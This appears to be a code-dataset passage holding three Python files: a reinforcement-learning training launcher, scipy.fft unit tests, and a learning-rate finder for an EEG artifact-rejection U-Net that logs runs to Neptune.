source
stringlengths
3
86
python
stringlengths
75
1.04M
train copy.py
# Copyright (c) 2021, Xu Chen, FUNLab, Xiamen University # All rights reserved. import os import torch import numpy as np import random from pathlib import Path from pprint import pprint from torch.utils.tensorboard import SummaryWriter import torch.multiprocessing as mp from multiprocessing import Queue from multiprocessing.sharedctypes import Value from config import get_config from common import make_env from eval import evaluation if __name__ == "__main__": # get specs parser = get_config() args = parser.parse_args() pprint(args) # cuda torch.set_num_threads(1) if args.cuda and torch.cuda.is_available(): print("choose to use gpu...") device1 = torch.device("cuda:0") device2 = torch.device("cpu") torch.backends.cudnn.benchmark = False torch.backends.cudnn.deterministic = True else: print("chosse to use cpu...") device1 = torch.device("cpu") device2 = torch.device("cpu") # dirs run_dir = args.run_dir assert isinstance(run_dir, Path) if not run_dir.exists(): os.makedirs(str(run_dir)) print(f"[train] run_dir is '{str(run_dir)}'.") method_dir = Path(os.path.join(run_dir, args.method)) assert isinstance(method_dir, Path) if not method_dir.exists(): os.makedirs(str(method_dir)) print(f"[train] method_dir is '{str(method_dir)}'.") # tensorboard writer = SummaryWriter(log_dir=os.path.join(method_dir, "train_tb")) # seed torch.manual_seed(args.seed) torch.cuda.manual_seed_all(args.seed) np.random.seed(args.seed) random.seed(args.seed) # env env = make_env(args, "train") eval_env = make_env(args, "eval") if args.use_eval else None config = { "args": args, "run_dir": run_dir, "method_dir": method_dir, "env": env, "device": device1, "writer": writer, } eval_config = { "args": args, "run_dir": run_dir, "method_dir": method_dir, "env": eval_env, "device": device2, "writer": writer } if args.scenario == "pattern": from runners.pattern import Runner # elif args.scenario == "precise": # from runners.precise import Runner runner = Runner("TrainRunner", config) eval_runner = Runner("EvalRunner", eval_config) # eval subprocess test_q = Queue() done_training = Value('i', False) p = mp.Process(target=evaluation, args=(args, eval_runner, test_q, done_training)) p.start() runner.run(test_q) # close envs env.close() if args.use_eval and eval_env is not env: eval_env.close()
test_numpy.py
from __future__ import division, absolute_import, print_function import queue import threading import multiprocessing import numpy as np import pytest from numpy.random import random from numpy.testing import ( assert_array_almost_equal, assert_array_equal, assert_allclose ) from pytest import raises as assert_raises import scipy.fft as fft def fft1(x): L = len(x) phase = -2j*np.pi*(np.arange(L)/float(L)) phase = np.arange(L).reshape(-1, 1) * phase return np.sum(x*np.exp(phase), axis=1) class TestFFTShift(object): def test_fft_n(self): assert_raises(ValueError, fft.fft, [1, 2, 3], 0) class TestFFT1D(object): def test_identity(self): maxlen = 512 x = random(maxlen) + 1j*random(maxlen) xr = random(maxlen) for i in range(1,maxlen): assert_array_almost_equal(fft.ifft(fft.fft(x[0:i])), x[0:i], decimal=12) assert_array_almost_equal(fft.irfft(fft.rfft(xr[0:i]),i), xr[0:i], decimal=12) def test_fft(self): x = random(30) + 1j*random(30) assert_array_almost_equal(fft1(x), fft.fft(x)) assert_array_almost_equal(fft1(x) / np.sqrt(30), fft.fft(x, norm="ortho")) def test_ifft(self): x = random(30) + 1j*random(30) assert_array_almost_equal(x, fft.ifft(fft.fft(x))) assert_array_almost_equal( x, fft.ifft(fft.fft(x, norm="ortho"), norm="ortho")) def test_fft2(self): x = random((30, 20)) + 1j*random((30, 20)) assert_array_almost_equal(fft.fft(fft.fft(x, axis=1), axis=0), fft.fft2(x)) assert_array_almost_equal(fft.fft2(x) / np.sqrt(30 * 20), fft.fft2(x, norm="ortho")) def test_ifft2(self): x = random((30, 20)) + 1j*random((30, 20)) assert_array_almost_equal(fft.ifft(fft.ifft(x, axis=1), axis=0), fft.ifft2(x)) assert_array_almost_equal(fft.ifft2(x) * np.sqrt(30 * 20), fft.ifft2(x, norm="ortho")) def test_fftn(self): x = random((30, 20, 10)) + 1j*random((30, 20, 10)) assert_array_almost_equal( fft.fft(fft.fft(fft.fft(x, axis=2), axis=1), axis=0), fft.fftn(x)) assert_array_almost_equal(fft.fftn(x) / np.sqrt(30 * 20 * 10), fft.fftn(x, norm="ortho")) def test_ifftn(self): x = random((30, 20, 10)) + 1j*random((30, 20, 10)) assert_array_almost_equal( fft.ifft(fft.ifft(fft.ifft(x, axis=2), axis=1), axis=0), fft.ifftn(x)) assert_array_almost_equal(fft.ifftn(x) * np.sqrt(30 * 20 * 10), fft.ifftn(x, norm="ortho")) def test_rfft(self): x = random(30) for n in [x.size, 2*x.size]: for norm in [None, 'ortho']: assert_array_almost_equal( fft.fft(x, n=n, norm=norm)[:(n//2 + 1)], fft.rfft(x, n=n, norm=norm)) assert_array_almost_equal(fft.rfft(x, n=n) / np.sqrt(n), fft.rfft(x, n=n, norm="ortho")) def test_irfft(self): x = random(30) assert_array_almost_equal(x, fft.irfft(fft.rfft(x))) assert_array_almost_equal( x, fft.irfft(fft.rfft(x, norm="ortho"), norm="ortho")) def test_rfft2(self): x = random((30, 20)) assert_array_almost_equal(fft.fft2(x)[:, :11], fft.rfft2(x)) assert_array_almost_equal(fft.rfft2(x) / np.sqrt(30 * 20), fft.rfft2(x, norm="ortho")) def test_irfft2(self): x = random((30, 20)) assert_array_almost_equal(x, fft.irfft2(fft.rfft2(x))) assert_array_almost_equal( x, fft.irfft2(fft.rfft2(x, norm="ortho"), norm="ortho")) def test_rfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(fft.fftn(x)[:, :, :6], fft.rfftn(x)) assert_array_almost_equal(fft.rfftn(x) / np.sqrt(30 * 20 * 10), fft.rfftn(x, norm="ortho")) def test_irfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(x, fft.irfftn(fft.rfftn(x))) assert_array_almost_equal( x, fft.irfftn(fft.rfftn(x, norm="ortho"), norm="ortho")) def test_hfft(self): x = random(14) + 1j*random(14) x_herm = np.concatenate((random(1), x, random(1))) x = np.concatenate((x_herm, x[::-1].conj())) assert_array_almost_equal(fft.fft(x), fft.hfft(x_herm)) assert_array_almost_equal(fft.hfft(x_herm) / np.sqrt(30), fft.hfft(x_herm, norm="ortho")) def test_ihfft(self): x = random(14) + 1j*random(14) x_herm = np.concatenate((random(1), x, random(1))) x = np.concatenate((x_herm, x[::-1].conj())) assert_array_almost_equal(x_herm, fft.ihfft(fft.hfft(x_herm))) assert_array_almost_equal( x_herm, fft.ihfft(fft.hfft(x_herm, norm="ortho"), norm="ortho")) def test_hfft2(self): x = random((30, 20)) assert_array_almost_equal(x, fft.hfft2(fft.ihfft2(x))) assert_array_almost_equal( x, fft.hfft2(fft.ihfft2(x, norm="ortho"), norm="ortho")) def test_ihfft2(self): x = random((30, 20)) assert_array_almost_equal(fft.ifft2(x)[:, :11], fft.ihfft2(x)) assert_array_almost_equal(fft.ihfft2(x) * np.sqrt(30 * 20), fft.ihfft2(x, norm="ortho")) def test_hfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(x, fft.hfftn(fft.ihfftn(x))) assert_array_almost_equal( x, fft.hfftn(fft.ihfftn(x, norm="ortho"), norm="ortho")) def test_ihfftn(self): x = random((30, 20, 10)) assert_array_almost_equal(fft.ifftn(x)[:, :, :6], fft.ihfftn(x)) assert_array_almost_equal(fft.ihfftn(x) * np.sqrt(30 * 20 * 10), fft.ihfftn(x, norm="ortho")) @pytest.mark.parametrize("op", [fft.fftn, fft.ifftn, fft.rfftn, fft.irfftn, fft.hfftn, fft.ihfftn]) def test_axes(self, op): x = random((30, 20, 10)) axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)] for a in axes: op_tr = op(np.transpose(x, a)) tr_op = np.transpose(op(x, axes=a), a) assert_array_almost_equal(op_tr, tr_op) def test_all_1d_norm_preserving(self): # verify that round-trip transforms are norm-preserving x = random(30) x_norm = np.linalg.norm(x) n = x.size * 2 func_pairs = [(fft.fft, fft.ifft), (fft.rfft, fft.irfft), # hfft: order so the first function takes x.size samples # (necessary for comparison to x_norm above) (fft.ihfft, fft.hfft), ] for forw, back in func_pairs: for n in [x.size, 2*x.size]: for norm in [None, 'ortho']: tmp = forw(x, n=n, norm=norm) tmp = back(tmp, n=n, norm=norm) assert_array_almost_equal(x_norm, np.linalg.norm(tmp)) @pytest.mark.parametrize("dtype", [np.half, np.single, np.double, np.longdouble]) def test_dtypes(self, dtype): # make sure that all input precisions are accepted x = random(30).astype(dtype) assert_array_almost_equal(fft.ifft(fft.fft(x)), x) assert_array_almost_equal(fft.irfft(fft.rfft(x)), x) assert_array_almost_equal(fft.hfft(fft.ihfft(x), len(x)), x) @pytest.mark.parametrize( "dtype", [np.float32, np.float64, np.longfloat, np.complex64, np.complex128, np.longcomplex]) @pytest.mark.parametrize("order", ["F", 'non-contiguous']) @pytest.mark.parametrize( "fft", [fft.fft, fft.fft2, fft.fftn, fft.ifft, fft.ifft2, fft.ifftn]) def test_fft_with_order(dtype, order, fft): # Check that FFT/IFFT produces identical results for C, Fortran and # non contiguous arrays rng = np.random.RandomState(42) X = rng.rand(8, 7, 13).astype(dtype, copy=False) if order == 'F': Y = np.asfortranarray(X) else: # Make a non contiguous array Y = X[::-1] X = np.ascontiguousarray(X[::-1]) if fft.__name__.endswith('fft'): for axis in range(3): X_res = fft(X, axis=axis) Y_res = fft(Y, axis=axis) assert_array_almost_equal(X_res, Y_res) elif fft.__name__.endswith(('fft2', 'fftn')): axes = [(0, 1), (1, 2), (0, 2)] if fft.__name__.endswith('fftn'): axes.extend([(0,), (1,), (2,), None]) for ax in axes: X_res = fft(X, axes=ax) Y_res = fft(Y, axes=ax) assert_array_almost_equal(X_res, Y_res) else: raise ValueError class TestFFTThreadSafe(object): threads = 16 input_shape = (800, 200) def _test_mtsame(self, func, *args): def worker(args, q): q.put(func(*args)) q = queue.Queue() expected = func(*args) # Spin off a bunch of threads to call the same function simultaneously t = [threading.Thread(target=worker, args=(args, q)) for i in range(self.threads)] [x.start() for x in t] [x.join() for x in t] # Make sure all threads returned the correct value for i in range(self.threads): assert_array_equal(q.get(timeout=5), expected, 'Function returned wrong value in multithreaded context') def test_fft(self): a = np.ones(self.input_shape) * 1+0j self._test_mtsame(fft.fft, a) def test_ifft(self): a = np.ones(self.input_shape) * 1+0j self._test_mtsame(fft.ifft, a) def test_rfft(self): a = np.ones(self.input_shape) self._test_mtsame(fft.rfft, a) def test_irfft(self): a = np.ones(self.input_shape) * 1+0j self._test_mtsame(fft.irfft, a) def test_hfft(self): a = np.ones(self.input_shape, np.complex64) self._test_mtsame(fft.hfft, a) def test_ihfft(self): a = np.ones(self.input_shape) self._test_mtsame(fft.ihfft, a) @pytest.mark.parametrize("func", [fft.fft, fft.ifft, fft.rfft, fft.irfft]) def test_multiprocess(func): # Test that fft still works after fork (gh-10422) with multiprocessing.Pool(2) as p: res = p.map(func, [np.ones(100) for _ in range(4)]) expect = func(np.ones(100)) for x in res: assert_allclose(x, expect) class TestIRFFTN(object): def test_not_last_axis_success(self): ar, ai = np.random.random((2, 16, 8, 32)) a = ar + 1j*ai axes = (-2,) # Should not raise error fft.irfftn(a, axes=axes)
1.Learning_rate_finder.py
import neptune.new as neptune import os import torch.nn as nn import torch import torch.nn.functional as F from torch.optim import SGD, Adam from torch.utils.data import DataLoader, random_split from torch.optim.lr_scheduler import CyclicLR, LambdaLR import torch.multiprocessing as mp import numpy as np import random import math import sys sys.path.append("..") # adds higher directory to python modules path from LoaderPACK.Unet_leaky import Unet_leaky, Unet_leaky_lstm from LoaderPACK.Loader import shuffle_5min from LoaderPACK.Accuarcy_finder import Accuarcy_find from LoaderPACK.Accuarcy_upload import Accuarcy_upload from multiprocessing import Process try: mp.set_start_method('spawn') except RuntimeError: pass def net_SGD1(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.01 # where we start the learning rate max_lr = 1 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = SGD(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") scheduler = CyclicLR(optimizer, base_lr=base_lr, max_lr=max_lr, step_size_up=nEpoch*(n_samples/batch_size)-1, cycle_momentum=False) # step_size_up is set so the learning rate is updated linearly smooth = 0.05 params = {"optimizer":"SGD", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"CyclicLR", "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "scheduler_cycle_momentum":False, "scheduler_step_size_up":nEpoch*(n_samples/batch_size)-1, "smooting_loss":smooth} run[f"network_SGD/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_SGD/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) if first_loss_save: run[f"network_SGD/train_loss_pr_file"].log(loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_SGD/validation_loss_pr_file"].log(loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False loss.backward() optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_SGD/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/train_confusion_matrix_pr_file"].log(t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_SGD", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_valid_loss[-1] smooth_valid_loss.append(sm_loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_SGD/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_SGD", "val") scheduler.step() run.stop() def net_SGD2(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.01 # where we start the learning rate max_lr = 1 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = SGD(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") lam = lambda x: math.exp(x*math.log(max_lr / base_lr) \ / (nEpoch*n_samples / batch_size)) scheduler = LambdaLR(optimizer, lam) # implement the exponential learning rate smooth = 0.05 params = {"optimizer":"SGD", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"Exponential", "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "smooting_loss":smooth} run[f"network_SGD/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_SGD/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) if first_loss_save: run[f"network_SGD/train_loss_pr_file"].log(loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_SGD/validation_loss_pr_file"].log(loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False loss.backward() optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_SGD/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_SGD/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/train_confusion_matrix_pr_file"].log(t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_SGD", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_SGD/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_valid_loss[-1] smooth_valid_loss.append(sm_loss) run[f"network_SGD/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_SGD/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_SGD/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_SGD", "val") scheduler.step() run.stop() def net_ADAM1(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.0000000001 # where we start the learning rate max_lr = 0.1 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = Adam(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") scheduler = CyclicLR(optimizer, base_lr=base_lr, max_lr=max_lr, step_size_up=nEpoch*(n_samples/batch_size)-1, cycle_momentum=False) # step_size_up is set accordingly to how often we update the learning rate smooth = 0.05 params = {"optimizer":"Adam", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"CyclicLR", "scheduler_cycle_momentum":False, "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "scheduler_step_size_up":nEpoch*(n_samples/batch_size)-1, "smooting_loss":smooth} run[f"network_ADAM/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_ADAM/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) loss.backward() if first_loss_save: run[f"network_ADAM/train_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_ADAM/validation_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g #print(tot_n) #print(total_neg_train) run[f"network_ADAM/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_ADAM/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/train_confusion_matrix_pr_file"].log( t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_ADAM", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_ADAM/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_ADAM/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_ADAM", "val") scheduler.step() run.stop() def net_ADAM2(device, fl, it, train_path, val_path): token = os.getenv('Neptune_api') run = neptune.init( project="NTLAB/artifact-rej-scalp", api_token=token, ) batch_size = 10 n_samples = 500 # how many samples do we collect train_load_file = shuffle_5min(path = train_path, series_dict = 'train_series_length.pickle', size = (195, 22, 2060000), device = device, length = n_samples) train_loader = torch.utils.data.DataLoader(train_load_file, batch_size=batch_size, shuffle=True, num_workers=0) val_load_file = shuffle_5min(path = val_path, series_dict = 'val_series_length.pickle', size = (28, 22, 549200), device = device, seed = 42, length = 50) val_loader = torch.utils.data.DataLoader(val_load_file, batch_size=batch_size, shuffle=False, num_workers=0) valid_loss, train_loss = [], [] smooth_valid_loss, smooth_train_loss = [], [] valid_acc = torch.tensor([]).to(device) train_acc = torch.tensor([]).to(device) nEpoch = 5 base_lr = 0.0001 # where we start the learning rate max_lr = 0.7 # where the learning rate is supposed to end model = Unet_leaky_lstm(n_channels=1, batch_size=batch_size, \ device=device).to(device) # model = Unet_leaky(n_channels=1, n_classes=2).to(device) optimizer = Adam(model.parameters(), lr=base_lr) lossFunc = nn.CrossEntropyLoss(weight = torch.tensor([1., 5.]).to(device), reduction = "mean") lam = lambda x: math.exp(x*math.log(max_lr / base_lr) \ / (nEpoch*n_samples / batch_size)) scheduler = LambdaLR(optimizer, lam) # implement the exponential learning rate smooth = 0.05 params = {"optimizer":"Adam", "batch_size":batch_size, "optimizer_learning_rate": base_lr, "loss_function":"CrossEntropyLoss", "loss_function_weights":[1, 5], "loss_function_reduction":"mean", "model":"Unet_leaky_lstm", "scheduler":"Exponential", "scheduler_base_lr":base_lr, "scheduler_max_lr":max_lr, "smooting_loss":smooth} run[f"network_ADAM/parameters"] = params first_loss_save = True for iEpoch in range(nEpoch): print(f"Training epoch {iEpoch}") for series in train_loader: run[f"network_ADAM/learning_rate"].log( optimizer.param_groups[0]['lr']) t_mat = torch.zeros(2, 2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) ind, tar, chan = series y_pred = model(ind) model.zero_grad() pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) loss.backward() if first_loss_save: run[f"network_ADAM/train_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(loss) smooth_train_loss.append(loss.item()) run[f"network_ADAM/validation_loss_pr_file"].log(loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(loss) smooth_valid_loss.append(loss.item()) first_loss_save = False optimizer.step() train_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) train_acc = torch.cat((train_acc, acc.view(1))) t_mat = t_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g #print(tot_n) #print(total_neg_train) run[f"network_ADAM/train_loss_pr_file"].log( np.mean(np.array(train_loss))) train_loss = [] sm_loss = loss.item() * smooth + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_train_loss_pr_file"].log(sm_loss) run[f"network_ADAM/train_acc_pr_file"].log(torch.mean(train_acc)) train_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/train_confusion_matrix_pr_file"].log( t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_ADAM", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_ADAM/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_ADAM/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_ADAM", "val") scheduler.step() run.stop() def net_starter(nets, device, fl, it, train_path, val_path): for net in nets: pr1 = mp.Process(target=net, args = (device, fl, it, train_path, val_path,)) pr1.start() pr1.join() if __name__ == '__main__': device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) if device == "cpu": fl = torch.FloatTensor it = torch.LongTensor else: fl = torch.cuda.FloatTensor it = torch.cuda.LongTensor core = torch.cuda.device_count() #core = 1 #networks = [net_ADAM1] # net_SGD2, net_ADAM2, net_SGD1, networks = [net_SGD1, net_ADAM1, net_SGD2, net_ADAM2] cuda_dict = dict() # cuda_dict[core] = networks for i in range(core): cuda_dict[i] = 